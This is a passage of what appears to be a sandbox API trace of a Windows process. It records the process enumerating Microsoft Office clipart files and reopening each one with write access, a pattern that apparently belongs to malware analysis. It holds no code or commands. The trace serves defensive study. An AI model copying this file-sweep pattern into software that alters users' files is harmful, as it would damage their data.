ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8)) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0103.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.500] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00443_.WMF", cAlternateFileName="")) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.501] AreFileApisANSI () returned 1 [0103.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.502] AreFileApisANSI () returned 1 [0103.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0103.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 69 [0103.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.502] GetFileType (hFile=0x33c) returned 0x1 [0103.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0103.502] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.502] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.503] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.503] CloseHandle (hObject=0x33c) returned 1 [0103.503] AreFileApisANSI () returned 1 [0103.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 69 [0103.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.503] GetFileType (hFile=0x33c) returned 0x1 [0103.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.503] CloseHandle (hObject=0x33c) returned 1 [0103.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.505] AreFileApisANSI () returned 1 [0103.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 69 [0103.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68c)) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0103.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.505] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00444_.WMF", cAlternateFileName="")) returned 1 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0103.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.506] AreFileApisANSI () returned 1 [0103.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.506] AreFileApisANSI () returned 1 [0103.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0103.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 69 [0103.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.507] GetFileType (hFile=0x33c) returned 0x1 [0103.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0103.508] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.508] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.508] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.508] CloseHandle (hObject=0x33c) returned 1 [0103.508] AreFileApisANSI () returned 1 [0103.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 69 [0103.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.509] GetFileType (hFile=0x33c) returned 0x1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.509] CloseHandle (hObject=0x33c) returned 1 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 